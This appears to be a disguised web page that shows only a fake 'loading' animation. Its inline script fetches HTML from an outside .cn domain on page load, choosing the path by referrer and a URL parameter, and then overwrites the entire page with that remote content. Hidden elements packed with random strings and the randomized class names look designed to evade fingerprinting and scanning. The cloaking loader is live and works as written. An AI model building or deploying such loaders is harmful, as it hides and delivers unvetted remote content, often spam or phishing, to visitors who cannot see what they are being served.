<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LRP6IHa {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LRP6IHa .wMrdHNRFQd {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LRP6IHa .content {
            line-height: 50px;
            text-align: center
        }

        .LRP6IHa .img {
            width: 100%
        }

        .LRP6IHa .jQ9tobI {
            text-align: center
        }

        .LRP6IHa .jQ9tobI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LRP6IHa .jQ9tobI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LRP6IHa .jQ9tobI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LRP6IHa .jQ9tobI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LRP6IHa .jQ9tobI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LRP6IHa .jQ9tobI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LRP6IHa .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Sxk7dzviR6f(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cAkOyP7 = Sxk7dzviR6f('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cAkOyP7 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cAkOyP7 +".html?a=share";
		}
		
        saic0BL=url+"#"+new Date().getTime();
        saic0BL && function() {
            $.get(saic0BL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>uWd5XkFwMpBS9xxL2pO8DujwO8BCmLBP3SFuPMYW9TqdSukaAYNboUSPJISPMPshxjPoMd0BfYpkEzO8SNJBz74PL2RgeEl1</div>
<ul style='display:none' >wfDShc1lT5mSQxRHZUHpDElIqfr36b1afZ</ul>
<p  style='display:none'>cfdKg6nvJWQEKo12Uk8fbKvUtQ1Bazw</p>
<a  href='#' style='display:none'>bL1jWmOmOsJ4wh4ID8lozAIzmxf6YJBtP1lEztE8XOOBdJCKSfZ6mSZjUawbRD33F</a>
<p  style='display:none'>cfdKg6nvJWQEKo12Uk8fbKvUtQ1Bazw</p>
<h1 style='display:none' >G0CjzvL1UgA3u82jpNd3mUOWdUGvYFgvCc5elM8UYusP3WDMaOv8fZnwvg8kWPOR5V4VHdprhklj3Yq6PyMTy0</h1>
<p  style='display:none'>cfdKg6nvJWQEKo12Uk8fbKvUtQ1Bazw</p>
<ul style='display:none' >wfDShc1lT5mSQxRHZUHpDElIqfr36b1afZ</ul><div class="LRP6IHa">
    <div class="wMrdHNRFQd">
        <div class="jQ9tobI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >Dk2UznyZtW9gIwNDBszZIVE87ABkRDuYdbM961xDhnCzE6Yk6fB7q3z</h1>
<img  src='' style='display:none'>
<div style='display:none'>qCkxjur4od3pON5wZRKfos44mBfHmYqLQmuuqoUvHCOOunGwfsgN9yUlUFpnseZQP4ULzx</div>
<img  src='' style='display:none'>
<ul style='display:none' >PnL0fHWIT63rDwfktFyZmqjCT1o0ZWSoRqtlRZ59cMWwlFIcSg67hKoQsfHIoZ3rO0QeM7LbjeT6fQIKRnZMUsWWs</ul>
<p  style='display:none'>okLYQd3OcW7lH0q3kFSMM4Si00sD5GWTSRNZLJe3fNgrIgYw4ppy3ae3FeS9hLXpl1GZT4</p>
<ul style='display:none' >PnL0fHWIT63rDwfktFyZmqjCT1o0ZWSoRqtlRZ59cMWwlFIcSg67hKoQsfHIoZ3rO0QeM7LbjeT6fQIKRnZMUsWWs</ul></body>
</html>